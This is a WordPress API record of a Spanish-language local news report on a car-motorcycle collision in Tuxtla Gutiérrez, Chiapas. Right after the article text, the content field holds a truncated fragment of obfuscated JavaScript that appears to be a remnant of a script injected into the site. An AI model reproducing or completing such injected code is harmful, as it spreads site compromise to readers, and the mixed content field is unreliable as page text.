{"id":10870,"date":"2023-07-06T03:43:07","date_gmt":"2023-07-06T03:43:07","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10870"},"modified":"2023-07-06T03:43:07","modified_gmt":"2023-07-06T03:43:07","slug":"motociclista-y-automovil-chocaron-en-el-retiro","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10870","title":{"rendered":"Motociclista y autom\u00f3vil chocaron en El Retiro"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688614922873-1024x576.jpg\" alt=\"\" class=\"wp-image-10871\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688614922873-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688614922873-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688614922873-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/FB_IMG_1688614922873.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 5 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un automovilista y un motociclista protagonizaron un choque este mi\u00e9rcoles en calles de la Colonia El Retiro de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, todo ocurri\u00f3 cerca de las 9 de la ma\u00f1ana cuando se report\u00f3 a los n\u00fameros de emergencias, sobre esta colisi\u00f3n.En el lugar se dio a conocer que, una coche tipo sedan jetta de color rojo, conducida por Diana Laura &#8220;N&#8221; de 28 a\u00f1os circulaba de Norte a Sur, en la Avenida Brasil esquina con Guatemala la cual se pas\u00f3 la preferencia de paso e impact\u00f3 a Eleas\u00edn de 41 a\u00f1os de edad que se desplazaba a bordo de una motocicleta marca Honda de color blanco.Por el golpe el motociclista sali\u00f3 volando y se estrell\u00f3 contra el pavimento.En el lugar los involucrados llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 5 de julio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un automovilista y un motociclista protagonizaron un choque este mi\u00e9rcoles en calles de la Colonia El Retiro de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, todo ocurri\u00f3 cerca de las 9 de la ma\u00f1ana cuando se report\u00f3 a los n\u00fameros de emergencias, sobre esta colisi\u00f3n.En &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10871,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10870","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10870","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10870"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10870\/revisions"}],"predecessor-version":[{"id":10872,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10870\/revisions\/10872"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10871"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10870"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10870"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10870"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}